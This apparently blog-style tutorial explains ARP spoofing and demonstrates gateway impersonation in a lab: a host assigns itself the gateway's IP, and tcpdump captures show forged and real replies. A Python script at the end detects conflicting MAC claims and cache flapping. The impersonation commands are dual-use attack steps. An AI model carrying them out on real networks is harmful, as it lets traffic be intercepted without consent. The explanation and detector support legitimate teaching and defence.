Whenever I see ARP I think back to renting a flat in Wuhan: the tenants were practically at war over the network, with all sorts of 网络执行官 (Network Law Enforcer), P2P终结者 (P2P Terminator), and the then-newly popular 360 showing "ARP attack" warnings every single day. I had no idea what it was, but it looked very impressive.
ARP spoofing falsifies the mapping between an IP address and a MAC address.
When a host communicates, before it sends an IP packet it looks up the destination IP's MAC address in its ARP table. If there is no entry, it sends an ARP request as a broadcast; once a reply comes back it updates the ARP cache and sends the packet. The ARP table is not fixed: entries have a refresh time, so they expire and the host asks again. ARP carries no authentication, so any host on the segment can answer a request (or send replies nobody asked for) and have its answer cached.
ARP spoofing comes in many variants: one-way, two-way, impersonating the gateway, impersonating a host, and so on. Below is a simple case of a forged gateway, done only as a test to illustrate the problem rather than as a real attack; it uses arping.
1: Under normal conditions, send an ARP request to the gateway
# arping -i eth1 10.8.160.1
2: The requesting host receives the replies
# tcpdump -i eth1 arp src host 10.8.160.1 -en
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), capture size 65535 bytes
13:20:19.330365 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46
13:20:20.324580 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46
13:20:21.325718 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46
13:20:22.326955 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46
3: Make another host impersonate the gateway by giving its interface the gateway's IP address
# ifconfig eth1 10.8.160.1
4: Send requests to the gateway as before
# arping -i eth1 10.8.160.1
5: Now two different replies arrive for every request; comparing the MAC addresses shows that both the forged gateway and the real gateway are answering
# tcpdump -i eth1 arp src host 10.8.160.1 -en
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), capture size 65535 bytes
13:25:18.421457 fa:16:3e:ab:1d:c3 > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 42: Reply 10.8.160.1 is-at fa:16:3e:ab:1d:c3, length 28
13:25:18.429627 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46
13:25:19.422435 fa:16:3e:ab:1d:c3 > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 42: Reply 10.8.160.1 is-at fa:16:3e:ab:1d:c3, length 28
13:25:19.422944 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46
13:25:20.423565 fa:16:3e:ab:1d:c3 > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 42: Reply 10.8.160.1 is-at fa:16:3e:ab:1d:c3, length 28
13:25:20.424061 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46
So the malicious machine has impersonated the gateway and answered the ARP requests; a victim that caches its reply will send all of its outbound traffic to it. Note that in this test the real gateway keeps answering too, so the victim's cache entry for 10.8.160.1 flips between the two MACs as each reply overwrites the last one; a real attack keeps sending replies to the victim so that the entry stays pointed at the attacker instead of flapping.
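As an added example (not part of the original post), here is the check a defender would run over captures like the two above. The Python script parses the `tcpdump -en` ARP reply lines, flags any IP that is announced by more than one MAC (the signature of the second "gateway"), flags replies whose Ethernet source differs from the MAC they advertise, and replays the replies through a simplified victim ARP cache to show the gateway entry flipping between the two MACs. The cache model (last reply wins, entries expire after a timeout), the function names and the extra `FORGED_SENDER` line are assumptions of this example, not the kernel's exact behaviour or anything from the page; the other sample lines are the page's own captures.

```python
import re
from dataclasses import dataclass

# Matches one ARP reply line as printed by 'tcpdump -en' in the captures above, e.g.
# 13:25:18.421457 fa:16:3e:ab:1d:c3 > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 42: Reply 10.8.160.1 is-at fa:16:3e:ab:1d:c3, length 28
MAC = r"(?:[0-9a-f]{2}:){5}[0-9a-f]{2}"
ARP_REPLY_RE = re.compile(
    rf"^(?P<ts>\d\d:\d\d:\d\d\.\d+)\s+(?P<src>{MAC}) > (?P<dst>{MAC}), "
    rf"ethertype ARP \(0x0806\), length \d+: "
    rf"Reply (?P<ip>\d+(?:\.\d+){{3}}) is-at (?P<mac>{MAC}), length \d+$"
)


@dataclass
class ArpReply:
    seconds: float  # capture timestamp as seconds since midnight
    src: str        # Ethernet source address of the frame
    dst: str        # Ethernet destination (the host that asked)
    ip: str         # IP the reply answers for
    mac: str        # MAC the reply claims that IP is at


def parse_arp_reply(line):
    """Return an ArpReply for a tcpdump ARP reply line, or None for any other line."""
    m = ARP_REPLY_RE.match(line.strip())
    if not m:
        return None
    h, mnt, s = m["ts"].split(":")
    return ArpReply(int(h) * 3600 + int(mnt) * 60 + float(s),
                    m["src"], m["dst"], m["ip"], m["mac"])


# Sample input: reply lines from the two captures on this page.
NORMAL_CAPTURE = [
    "13:20:19.330365 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46",
    "13:20:20.324580 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46",
]
SPOOFED_CAPTURE = [
    "13:25:18.421457 fa:16:3e:ab:1d:c3 > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 42: Reply 10.8.160.1 is-at fa:16:3e:ab:1d:c3, length 28",
    "13:25:18.429627 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46",
    "13:25:19.422435 fa:16:3e:ab:1d:c3 > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 42: Reply 10.8.160.1 is-at fa:16:3e:ab:1d:c3, length 28",
    "13:25:19.422944 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46",
    "13:25:20.423565 fa:16:3e:ab:1d:c3 > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 42: Reply 10.8.160.1 is-at fa:16:3e:ab:1d:c3, length 28",
    "13:25:20.424061 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46",
]
# Constructed line (not from the page): the frame's Ethernet source differs from the MAC in the ARP payload.
FORGED_SENDER = [
    "13:30:00.000000 fa:16:3e:ab:1d:c3 > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 42: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 28",
]


def claimed_macs(lines):
    """Map every IP seen in replies to the set of MACs that claimed it."""
    seen = {}
    for r in filter(None, map(parse_arp_reply, lines)):
        seen.setdefault(r.ip, set()).add(r.mac)
    return seen


def find_conflicts(lines):
    """IPs answered by more than one MAC: the signature of a second 'gateway' on the segment."""
    return {ip: sorted(macs) for ip, macs in claimed_macs(lines).items() if len(macs) > 1}


def sender_mismatches(lines):
    """Replies whose frame source is not the MAC they advertise, a common forgery artefact."""
    return [r for r in filter(None, map(parse_arp_reply, lines)) if r.src != r.mac]


def replay_cache(lines, timeout=30.0):
    """Simplified victim ARP cache (an assumed model, not the kernel's neighbour state machine):
    every reply overwrites the entry, so the last reply wins, and an entry not refreshed
    within `timeout` seconds is dropped. Returns (final cache, number of MAC flips)."""
    cache = {}  # ip -> (mac, last_seen_seconds)
    flips = 0
    for r in filter(None, map(parse_arp_reply, lines)):
        for stale in [ip for ip, (_, t) in cache.items() if r.seconds - t > timeout]:
            del cache[stale]
        old = cache.get(r.ip)
        if old is not None and old[0] != r.mac:
            flips += 1
        cache[r.ip] = (r.mac, r.seconds)
    return cache, flips


if __name__ == "__main__":
    for name, capture in (("normal", NORMAL_CAPTURE), ("spoofed", SPOOFED_CAPTURE)):
        cache, flips = replay_cache(capture)
        print(f"{name}: conflicts={find_conflicts(capture)} flips={flips} "
              f"gateway now at {cache['10.8.160.1'][0]}")
    for r in sender_mismatches(FORGED_SENDER):
        print(f"forged sender: frame from {r.src} claims {r.ip} is-at {r.mac}")
```

Run it on a live capture with `tcpdump -i eth1 -en arp -l | python3 script.py` after replacing the sample lists with `sys.stdin`; on the spoofed capture it reports the conflict for 10.8.160.1 and five flips in six replies, which is exactly the flapping a victim sees while both gateways answer.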